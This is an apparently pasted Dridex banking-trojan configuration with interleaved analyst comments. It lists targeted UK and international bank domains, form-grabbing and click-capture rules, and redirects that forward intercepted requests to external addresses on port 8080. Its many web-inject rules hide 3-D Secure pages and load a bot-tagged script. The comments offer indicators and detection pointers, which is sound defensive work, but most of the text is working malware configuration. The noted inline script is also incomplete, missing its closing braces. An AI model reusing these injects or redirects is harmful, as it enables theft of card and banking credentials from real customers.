Matthewm

Dridex bot 220 settings

Apr 30th, 2015
  1. Dridex bot 220 settings for analysis purposes:
  2. <settings hash="f872348d9ca57eb4f2a381b8543a19f4c047bda0">
  3. <httpshots>
     <!-- Analyst note: URL filter list for the "httpshots" feature. Each <url> is a regex
          carrying type (allow/deny) and onget/onpost flags. The two deny rules exclude
          static assets and resource.axd / yimg.com; the single allow rule matches
          https://www.bankline.* on natwest.com, rbs.com and ulsterbank.(ie|co.uk).
          Presumably a match triggers screenshot capture of the page; the capture
          behaviour itself is not visible in this config, confirm against the sample. -->
  4. <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
  5. <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
  6. <url type="allow" onget="1" onpost="1">^https://www\.bankline\.(natwest\.com|rbs\.com|ulsterbank\.(ie|co\.uk))/</url>
  7. </httpshots>
  8. <httpinjblock>
     <!-- Analyst note: list of host/path regexes, every entry type="allow". The entries are
          hostnames (a few with paths) under bank and payment-provider domains, plus some
          metrics/marketing hosts. What the bot does on a match is not shown here; the
          element name suggests the request is blocked or handled by the inject engine,
          TODO confirm against the binary. For defenders the list is mainly useful as an
          inventory of institutions this build targets. The natwestoffshore entry appears
          twice (listing lines 12 and 26). -->
  9. <url type="allow">(|\.)alstats\.com</url>
  10. <url type="allow">sucmetrics\.unicredit\.it</url>
  11. <url type="allow">uni\.ibank\.nbg\.gr</url>
  12. <url type="allow">www7\.onlinebanking\.natwestoffshore\.com</url>
  13. <url type="allow">staticres\.klikbca\.com</url>
  14. <url type="allow">www7\.rbsdigital\.com</url>
  15. <url type="allow">www3\.bankline\.rbs\.com</url>
  16. <url type="allow">check\.tsb\.co\.uk</url>
  17. <url type="allow">www7\.ulsterbankanytimebanking\.co\.uk</url>
  18. <url type="allow">www7\.ulsterbankanytimebanking\.ie</url>
  19. <url type="allow">www3\.bankline\.ulsterbank\.co\.uk</url>
  20. <url type="allow">www3\.bankline\.ulsterbank\.ie</url>
  21. <url type="allow">pioneer\.co\-operativebank\.co\.uk</url>
  22. <url type="allow">mc3\.retail\.santander\.co\.uk</url>
  23. <url type="allow">yellow\.co\-operativebank\.co\.uk</url>
  24. <url type="allow">www3\.bankline\.natwest\.com</url>
  25. <url type="allow">tppa\.bmo\.com</url>
  26. <url type="allow">www7\.onlinebanking\.natwestoffshore\.com</url>
  27. <url type="allow">www\.t32\.pnc\.com</url>
  28. <url type="allow">pane\.bankofamerica\.com</url>
  29. <url type="allow">www\.u43\.pnc\.com/pressroom</url>
  30. <url type="allow">www\.isbank\.com\.tr/Internet/images7</url>
  31. <url type="allow">fbds7\.tangerine\.ca</url>
  32. <url type="allow">www7\.suntrust\.com</url>
  33. <url type="allow">tts\.dlbank\.be</url>
  34. <url type="allow">iss\.gtbank\.com</url>
  35. <url type="allow">www7\.nwolb\.com</url>
  36. <url type="allow">b8k\.nationwide\.co\.uk</url>
  37. <url type="allow">smetrics\.nationwide\.co\.uk</url>
  38. <url type="allow">road\.nationwide\.co\.uk</url>
  39. <url type="allow">roll\.nationwide\.co\.uk</url>
  40. <url type="allow">cws\.bankline\.rbs\.com</url>
  41. <url type="allow">cws\.bankline\.natwest\.com</url>
  42. <url type="allow">nsc\.natwest\.com</url>
  43. <url type="allow">nsc\.rbs\.co\.uk</url>
  44. <url type="allow">nsc\.ulsterbank\.co\.uk</url>
  45. <url type="allow">sc\.natwest\.com</url>
  46. <url type="allow">sc\.rbs\.co\.uk</url>
  47. <url type="allow">sc\.ulsterbank\.co\.uk</url>
  48. <url type="allow">marketing\.lloydsbank\.co\.uk</url>
  49. <url type="allow">marketing\.bankofscotland\.co\.uk</url>
  50. <url type="allow">marketing\.tsb\.co\.uk</url>
  51. <url type="allow">.*\.member-hsbc-group\.com</url>
  52. <url type="allow">mcmprod\.hsbc\.co\.uk</url>
  53. <url type="allow">cdn\.bankofscotland\.co\.uk</url>
  54. <url type="allow">lab\.lloydsbank\.com</url>
  55. <url type="allow">check\.lloydsbank\.co\.uk</url>
  56. <url type="allow">check2\.lloydsbank\.co\.uk</url>
  57. <url type="allow">check\.bankofscotland\.co\.uk</url>
  58. <url type="allow">check2\.bankofscotland\.co\.uk</url>
  59. <url type="allow">cs\.directnet\.com/dn/csd/u4F</url>
  60. <url type="allow">grey\.smile\.co\.uk</url>
  61. <url type="allow">u8n\.business\.santander\.co\.uk</url>
  62. <url type="allow">www7\.secure\.investec\.com</url>
  63. <url type="allow">press\.retail\.santander\.co\.uk</url>
  64. <url type="allow">images\.coventrybuildingsociety\.co\.uk</url>
  65. <url type="allow">www\.bankline\.natwest\.com/CWSLogon/analytics</url>
  66. <url type="allow">www\.bankline\.ulsterbank\.ie/CWSLogon/analytics</url>
  67. <url type="allow">www\.bankline\.ulsterbank\.co\.uk/CWSLogon/analytics</url>
  68. <url type="allow">www\.bankline\.rbs\.com/CWSLogon/analytics</url>
  69. <url type="allow">metrics\.barclays\.co\.uk</url>
  70. <url type="allow">smetrics\.barclays\.co\.uk</url>
  71. <url type="allow">media\.barclays\.co\.uk</url>
  72. <url type="allow">resources\.barclays\.co\.uk</url>
  73. <url type="allow">cdn\.riyadonline\.com</url>
  74. <url type="allow">rac\.bankia\.es</url>
  75. <url type="allow">web12\.columbiabank\.com</url>
  76. <url type="allow">marketing\.halifax\-online\.co\.uk</url>
  77. <url type="allow">room\.business\.santander\.co\.uk</url>
  78. <url type="allow">indigo\.co\-operativebank\.co\.uk</url>
  79. <url type="allow">reporting\.cbonline\.co\.uk</url>
  80. <url type="allow">cdn\.retail\.metrobankonline\.co\.uk</url>
  81. <url type="allow">img3\.moneygram\.com</url>
  82. <url type="allow">mujcz\.erasvet\.cz</url>
  83. </httpinjblock>
  84. <httpblock>
     <!-- Analyst note: regexes for third-party analytics, tag-management, ad-serving and
          session-recording services (for example omtrdc.net, doubleclick.net,
          sessioncam.com, userreplay.net), all type="allow". The element name suggests the
          bot blocks matching requests in the victim browser, presumably so that client-side
          telemetry does not record the modified pages; this is inferred from the name and
          the domain list, TODO confirm. If so, a banking session that loads normally but
          emits none of its usual analytics beacons is a possible server-side signal. -->
  85. <url type="allow">.*\.levexis\.com</url>
  86. <url type="allow">.*\.omtrdc\.net</url>
  87. <url type="allow">.*\.doubleclick\.net</url>
  88. <url type="allow">.*\.parastorage\.com</url>
  89. <url type="allow">.*\.webtrendslive\.com</url>
  90. <url type="allow">webtrends\.com</url>
  91. <url type="allow">.*\.creativevirtual\.com</url>
  92. <url type="allow">.*\.tiqcdn\.com</url>
  93. <url type="allow">.*\.serving-sys\.com</url>
  94. <url type="allow">.*\.maxymiser\.net</url>
  95. <url type="allow">.*\.atdmt\.com</url>
  96. <url type="allow">splash-screen\.net</url>
  97. <url type="allow">www\.analytics\-control\.com</url>
  98. <url type="allow">.*\.smartsourceportal\.com</url>
  99. <url type="allow">.*\.na1\.netsuite\.com</url>
  100. <url type="allow">.*\.userreplay\.net</url>
  101. <url type="allow">.*\.sessioncam\.com</url>
  102. <url type="allow">.*\.intenthq\.com</url>
  103. <url type="allow">.*\.tribalfusion\.com</url>
  104. <url type="allow">.*\.mookie1\.com</url>
  105. <url type="allow">.*\.adnxs\.com</url>
  106. <url type="allow">assets\.adobedtm\.com</url>
  107. <url type="allow">.*\.jwpcdn\.com</url>
  108. <url type="allow">.*\.mediaplex\.com</url>
  109. <url type="allow">unicredit\.it/ecomm/logrequest\.jsp</url>
  110. </httpblock>
  111. <formgrabber>
     <!-- Analyst note: allow/deny regex list scoping the form-grabbing feature. The login
          endpoints of AOL, Google, Yahoo and Live are allowed explicitly and are listed
          before the broader deny rules for the same domains, so rule order appears to
          matter (first match wins, presumed; the evaluation logic is not in this file).
          The remaining deny rules exclude noisy traffic such as OCSP, safebrowsing, Skype
          and ad/measurement hosts. What happens to URLs matching no rule is not shown.
          Several patterns leave the dot unescaped (aol.com, vk.com, lphbs.com), so they
          match more than the literal hostname. -->
  112. <url type="deny">\.(swf)($|\?)</url>
  113. <url type="deny">/isapi/ocget.dll</url>
  114. <url type="allow">^https?://aol.com/.*/login/</url>
  115. <url type="allow">^https?://accounts.google.com/ServiceLoginAuth</url>
  116. <url type="allow">^https?://login.yahoo.com/</url>
  117. <url type="allow">^https?://login.live.com/</url>
  118. <url type="deny">^https?://(\w+\.)?aol.com</url>
  119. <url type="deny">^https?://(\w+\.)?facebook.com/</url>
  120. <url type="deny">^https?://(\w+\.)?google</url>
  121. <url type="deny">^https?://(\w+\.)?yahoo</url>
  122. <url type="deny">^https?://(\w+\.)?youtube.com</url>
  123. <url type="deny">^https?://(\w+\.)?live.com</url>
  124. <url type="deny">^https?://(\w+\.)?twitter.com</url>
  125. <url type="deny">^https?://(\w+\.)?vk.com</url>
  126. <url type="deny">^https.*ocsp\..+$</url>
  127. <url type="deny">^https.*safebrowsing\..+$</url>
  128. <url type="deny">^https?://fhr\.data\.mozilla\.com</url>
  129. <url type="deny">^https://s.*\.symcd\.com</url>
  130. <url type="deny">^https://s.*\.symcb\.com</url>
  131. <url type="deny">^https.*ocsp2\..+$</url>
  132. <url type="deny">localhost.+skypectoc/.+$</url>
  133. <url type="deny">\.messenger\.live\.com</url>
  134. <url type="deny">pipe\.skype\.com</url>
  135. <url type="deny">\.optimatic\.com</url>
  136. <url type="deny">hiro\.tv</url>
  137. <url type="deny">spotxchange\.com</url>
  138. <url type="deny">nielsen\.com</url>
  139. <url type="deny">mapquest\.com</url>
  140. <url type="deny">^https://.+\.skype\.com/api/</url>
  141. <url type="deny">(//|\.)lphbs.com</url>
  142. <url type="deny">(//|\.)zynga.com</url>
  143. </formgrabber>
  144. <clickshots>
     <!-- Analyst note: two allow rules, both for Barclays corporate logon URLs
          (ibank1.bib.barclays.com and cashmanagement.barclays.net), each with clicks="12",
          xrange="40", yrange="40". Presumably the bot captures a 40x40 region around each
          of up to 12 mouse clicks on these pages, which would record input made through
          on-screen keypads; the attribute meanings are inferred from their names only,
          TODO confirm. -->
  145. <url type="allow" onpost="1" onget="1" clicks="12" xrange="40" yrange="40">^https://ibank1\.bib\.barclays\.com/logon/bibapplication.+LOGON\.VALIDATE\.SIGNED</url>
  146. <url type="allow" onpost="1" onget="1" clicks="12" xrange="40" yrange="40">^https://cashmanagement\.barclays\.net/portalservices/forms/login\.pser\?TYPE.+cashmanagement</url>
  147. </clickshots>
  148. <redirects>
     <!-- Analyst note: each <redirect> pairs its element text (a script name or a path) with
          an external uri over plain HTTP on port 8080 and a timeout of 20.
          Network indicators in this sample:
            80.86.93.225:8080    paths /userexperiences and /tickingservice
            202.190.179.94:8080  paths /logs/dtukvbv/js.php and /logs/dtukvbv/in.php
          Entries vbv1/vbv2 use the same /logs/dtukvbv/ paths that the httpinject
          replacements in this config load as a same-origin script src, so the bot
          presumably intercepts those requests on the host and forwards them to the uri
          (postfwd="1" suggests POST bodies are forwarded too); confirm against the sample.
          If that holds, the real site never receives the request, and detection has to rely
          on host telemetry or on egress traffic to the addresses above.
          Only entry "2nd" sets vnc="1" and socks="1"; what those flags enable is not shown. -->
  149. <redirect name="1st" vnc="0" socks="0" uri="http://80.86.93.225:8080/userexperiences" timeout="20">webstsomni.js</redirect>
  150. <redirect name="2nd" vnc="1" socks="1" uri="http://80.86.93.225:8080/tickingservice" timeout="20">webcticker.js</redirect>
  151. <redirect name="vbv1" vnc="0" socks="0" postfwd="1" uri="http://202.190.179.94:8080/logs/dtukvbv/js.php" timeout="20">/logs/dtukvbv/js.php</redirect>
  152. <redirect name="vbv2" vnc="0" socks="0" postfwd="1" uri="http://202.190.179.94:8080/logs/dtukvbv/in.php" timeout="20">/logs/dtukvbv/in.php</redirect>
  153. </redirects>
  154. <httpinjects>
  155. <httpinject>
     <!-- Analyst note: webinject rule for card-issuer 3-D Secure pages.
          Conditions: applies to any https URL containing /tdsecure/intro.jsp (GET and POST);
          static assets are excluded on GET.
          Action 1 replaces onKeyDown="..." attributes with an empty handler.
          Action 2 re-emits the matched head tag (\1) followed by: a style that hides the page
          body, jQuery 1.4.2 from ajax.googleapis.com, and an inline script. The inline script
          reads document.referrer, extracts the partner= value, maps it to a per-issuer
          "system" label depending on which issuer URL the referrer contains, and then
          appends a script element with id owf82ivosd whose src is the same-origin path
          /logs/dtukvbv/js.php with r, botid, type and system parameters. $_BOT_ID_$ looks
          like a placeholder substituted by the bot (presumed).
          The inline script as pasted has no closing-brace lines, so the listing is not a
          faithful copy of the original script text.
          Detection pointers: a script element with id owf82ivosd in the DOM of a 3-D Secure
          page, or browser requests to /logs/dtukvbv/ on an issuer domain. -->
  156. <conditions>
  157. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*/tdsecure/intro\.jsp.*]]></url>
  158. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  159. </url>
  160. </conditions>
  161. <actions>
  162. <modify>
  163. <pattern modifiers="msU"><![CDATA[onKeyDown\=".*"]]></pattern>
  164. <replacement><![CDATA[onKeyDown=""]]></replacement>
  165. </modify>
  166. <modify>
  167. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  168. <replacement><![CDATA[\1<style type="text/css">
  169. body {visibility: hidden; }
  170. </style>
  171. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  172. <script type="text/javascript" language="JavaScript">
  173. (function() {
  174. if(!document.getElementById('owf82ivosd')) {
  175. var system = '';
  176. var refer = document.referrer;
  177. if(refer && refer.length) {
  178. if(refer.match(/partner=([^&]+)&/i)) {
  179. system = refer.match(/partner=([^&]+)&/i)[1];
  180. else if(refer.match(/partner=([^&]+)$/i)) {
  181. system = refer.match(/partner=([^&]+)$/i)[1];
  182. if(system) {
  183. if(refer.indexOf('https://secure.barclaycard.co.uk/barclays/tdsecure/') !== -1) { // domain
  184. system = system.toLowerCase();
  185. if(system == 'debit.visa') { // system
  186. system = 'barclays.debit.visa'; // edited system
  187. else if(system == 'debit.mc') {
  188. system = 'barclays.debit.mc';
  189. else if(system == 'barclaycard.visa') {
  190. system = 'barclaycard.visa';
  191. else if(system == 'barclaycard.mc') {
  192. system = 'barclaycard.mc';
  193. else if(system == 'business.visa') {
  194. system = 'barclays.business.visa';
  195. else if(system == 'business.mc') {
  196. system = 'barclays.business.mc';
  197. else if(refer.indexOf('https://verifiedbyvisa.barclays.co.uk/barclays/tdsecure/') !== -1) {
  198. system = system.toLowerCase();
  199. if(system == 'debit.mc') {
  200. system = 'vbv.barclays.debit.mc';
  201. else if(system == 'debit.visa') {
  202. system = 'vbv.barclays.debit.visa';
  203. else if(refer.indexOf('https://www.clicksafe.lloydstsb.com/lloyds/tdsecure/') !== -1) {
  204. system = system.toLowerCase();
  205. if(system == 'mc') {
  206. system = 'clicksafe.mc';
  207. else if(system == 'debit') {
  208. system = 'clicksafe.debit';
  209. else if(refer.indexOf('https://www.securesuite.co.uk/lloyds/tdsecure/') !== -1) {
  210. system = system.toLowerCase();
  211. if(system == 'corporate.mc') {
  212. system = 'lloyds.corporate.mc';
  213. else if(system == 'corporate.visa') {
  214. system = 'lloyds.corporate.visa';
  215. else if(refer.indexOf('https://www.securesuite.co.uk/verde/tdsecure/') !== -1) {
  216. system = system.toLowerCase();
  217. if(system == 'mc') {
  218. system = 'verde.mc';
  219. else if(system == 'debit') {
  220. system = 'verde.debit';
  221. else if(refer.indexOf('https://www.securesuite.co.uk/alliance-leicester/tdsecure/') !== -1) {
  222. system = system.toLowerCase();
  223. if(system == 'retail') {
  224. system = 'alliance-leicester.retail';
  225. else if(system == 'commercial') {
  226. system = 'alliance-leicester.commercial';
  227. else if(refer.indexOf('https://www.securesuite.co.uk/isracard/tdsecure/') !== -1) {
  228. system = system.toLowerCase();
  229. if(system == 'mc') {
  230. system = 'isracard.mc';
  231. else if(system == 'debit') {
  232. system = 'isracard.debit';
  233. var c = Math.random();
  234. var script = document.createElement('script');
  235. script.type = 'text/javascript';
  236. script.id = 'owf82ivosd';
  237. script.src = '/logs/dtukvbv/js.php?r='+encodeURIComponent(c.toString())+'&botid='+encodeURIComponent('$_BOT_ID_$')+'&type=js&system='+system;
  238. document.getElementsByTagName('head')[0].appendChild(script);
  239. })();
  240. </script>]]></replacement>
  241. </modify>
  242. </actions>
  243. </httpinject>
  244. <httpinject>
     <!-- Analyst note: webinject rule for the securesuite.co.uk /aib/tdsecure/pa.jsp page when
          the URL contains aib.visa followed by an ampersand; static assets are excluded on GET.
          The single action re-emits the matched head tag (\1) followed by a style that hides
          the page body, jQuery 1.4.2 from ajax.googleapis.com, and a script tag whose src is
          the same-origin path /logs/dtukvbv/js.php with botid, type=js and system=aib.visa.
          The script body is fetched at run time and is not part of this config.
          The httpinject entries after this one in the paste follow the same template and
          differ in the URL regex, the case of the head pattern and the system= value; one
          of them also blanks onKeyDown handlers. -->
  245. <conditions>
  246. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*aib\.visa&.*]]></url>
  247. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  248. </url>
  249. </conditions>
  250. <actions>
  251. <modify>
  252. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  253. <replacement><![CDATA[\1<style type="text/css">
  254. body {visibility: hidden; }
  255. </style>
  256. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  257. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=aib.visa"></script>]]></replacement>
  258. </modify>
  259. </actions>
  260. </httpinject>
  261. <httpinject>
  262. <conditions>
  263. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*aib\.mc&.*]]></url>
  264. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  265. </url>
  266. </conditions>
  267. <actions>
  268. <modify>
  269. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  270. <replacement><![CDATA[\1<style type="text/css">
  271. body {visibility: hidden; }
  272. </style>
  273. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  274. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=aib.mc"></script>]]></replacement>
  275. </modify>
  276. </actions>
  277. </httpinject>
  278. <httpinject>
  279. <conditions>
  280. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*SAGA&.*]]></url>
  281. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  282. </url>
  283. </conditions>
  284. <actions>
  285. <modify>
  286. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  287. <replacement><![CDATA[\1<style type="text/css">
  288. body {visibility: hidden; }
  289. </style>
  290. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  291. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=SAGA"></script>]]></replacement>
  292. </modify>
  293. <modify>
  294. <pattern modifiers="msU"><![CDATA[onKeyDown\=".*"]]></pattern>
  295. <replacement><![CDATA[onKeyDown=""]]></replacement>
  296. </modify>
  297. </actions>
  298. </httpinject>
  299. <httpinject>
  300. <conditions>
  301. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*ftb\.visa&.*]]></url>
  302. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  303. </url>
  304. </conditions>
  305. <actions>
  306. <modify>
  307. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  308. <replacement><![CDATA[\1<style type="text/css">
  309. body {visibility: hidden; }
  310. </style>
  311. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  312. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=ftb.visa"></script>]]></replacement>
  313. </modify>
  314. </actions>
  315. </httpinject>
  316. <httpinject>
  317. <conditions>
  318. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*ftb\.mc&.*]]></url>
  319. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  320. </url>
  321. </conditions>
  322. <actions>
  323. <modify>
  324. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  325. <replacement><![CDATA[\1<style type="text/css">
  326. body {visibility: hidden; }
  327. </style>
  328. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  329. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=ftb.mc"></script>]]></replacement>
  330. </modify>
  331. </actions>
  332. </httpinject>
  333. <httpinject>
  334. <conditions>
  335. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secure.*\.arcot\.com/acspage/cap\?RID\=.*]]></url>
  336. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  337. </url>
  338. </conditions>
  339. <actions>
  340. <modify>
  341. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  342. <replacement><![CDATA[\1<style type="text/css">
  343. body {visibility: hidden; }
  344. </style>
  345. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  346. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=arcot.secure"></script>]]></replacement>
  347. </modify>
  348. </actions>
  349. </httpinject>
  350. <httpinject>
  351. <conditions>
  352. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://tsys\.arcot\.com/acspage/cap\?RID\=.*]]></url>
  353. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  354. </url>
  355. </conditions>
  356. <actions>
  357. <modify>
  358. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  359. <replacement><![CDATA[\1<style type="text/css">
  360. body {visibility: hidden; }
  361. </style>
  362. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  363. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=arcot.tsys"></script>]]></replacement>
  364. </modify>
  365. </actions>
  366. </httpinject>
  367. <httpinject>
  368. <conditions>
  369. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cap\.securecode\.com/acspage/cap\?RID\=.*]]></url>
  370. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  371. </url>
  372. </conditions>
  373. <actions>
  374. <modify>
  375. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  376. <replacement><![CDATA[\1<style type="text/css">
  377. body {visibility: hidden; }
  378. </style>
  379. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  380. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=securecode"></script>]]></replacement>
  381. </modify>
  382. </actions>
  383. </httpinject>
  384. <httpinject>
  385. <conditions>
  386. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.citibank\.co\.in/acspage/cap_nsapi\.so\?RID\=.*]]></url>
  387. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  388. </url>
  389. </conditions>
  390. <actions>
  391. <modify>
  392. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  393. <replacement><![CDATA[\1<style type="text/css">
  394. body {visibility: hidden; }
  395. </style>
  396. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  397. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=citibank.co.in"></script>]]></replacement>
  398. </modify>
  399. </actions>
  400. </httpinject>
  401. <httpinject>
  402. <conditions>
  403. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.mycardsecure\.com/acspage/cap\.dll\?RID\=.*]]></url>
  404. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  405. </url>
  406. </conditions>
  407. <actions>
  408. <modify>
  409. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  410. <replacement><![CDATA[\1<style type="text/css">
  411. body {visibility: hidden; }
  412. </style>
  413. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  414. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=mycardsecure"></script>]]></replacement>
  415. </modify>
  416. </actions>
  417. </httpinject>
  418. <httpinject>
  419. <conditions>
  420. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.icicibank\.com/acspage/cap\?RID\=.*]]></url>
  421. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  422. </url>
  423. </conditions>
  424. <actions>
  425. <modify>
  426. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  427. <replacement><![CDATA[\1<style type="text/css">
  428. body {visibility: hidden; }
  429. </style>
  430. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  431. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=icicibank"></script>]]></replacement>
  432. </modify>
  433. </actions>
  434. </httpinject>
  435. <httpinject>
  436. <conditions>
  437. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.standardchartered\.com/acspage/cap\?RID\=.*]]></url>
  438. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  439. </url>
  440. </conditions>
  441. <actions>
  442. <modify>
  443. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  444. <replacement><![CDATA[\1<style type="text/css">
  445. body {visibility: hidden; }
  446. </style>
  447. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  448. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=standardchartered"></script>]]></replacement>
  449. </modify>
  450. </actions>
  451. </httpinject>
  452. <httpinject>
  453. <conditions>
  454. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://i3d\.borica\.bg/acspage/cap\?RID\=.*]]></url>
  455. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  456. </url>
  457. </conditions>
  458. <actions>
  459. <modify>
  460. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  461. <replacement><![CDATA[\1<style type="text/css">
  462. body {visibility: hidden; }
  463. </style>
  464. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  465. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=borica"></script>]]></replacement>
  466. </modify>
  467. </actions>
  468. </httpinject>
  469. <httpinject>
  470. <conditions>
  471. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs-ch\.cal-online\.co\.il/acspage/cap\?RID\=.*]]></url>
  472. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  473. </url>
  474. </conditions>
  475. <actions>
  476. <modify>
  477. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  478. <replacement><![CDATA[\1<style type="text/css">
  479. body {visibility: hidden; }
  480. </style>
  481. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  482. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cal-online"></script>]]></replacement>
  483. </modify>
  484. </actions>
  485. </httpinject>
  486. <httpinject>
  487. <conditions>
  488. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3dsecure\.paylife\.at/acspage/cap\?RID\=.*]]></url>
  489. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  490. </url>
  491. </conditions>
  492. <actions>
  493. <modify>
  494. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  495. <replacement><![CDATA[\1<style type="text/css">
  496. body {visibility: hidden; }
  497. </style>
  498. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  499. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=paylife"></script>]]></replacement>
  500. </modify>
  501. </actions>
  502. </httpinject>
  503. <httpinject>
  504. <conditions>
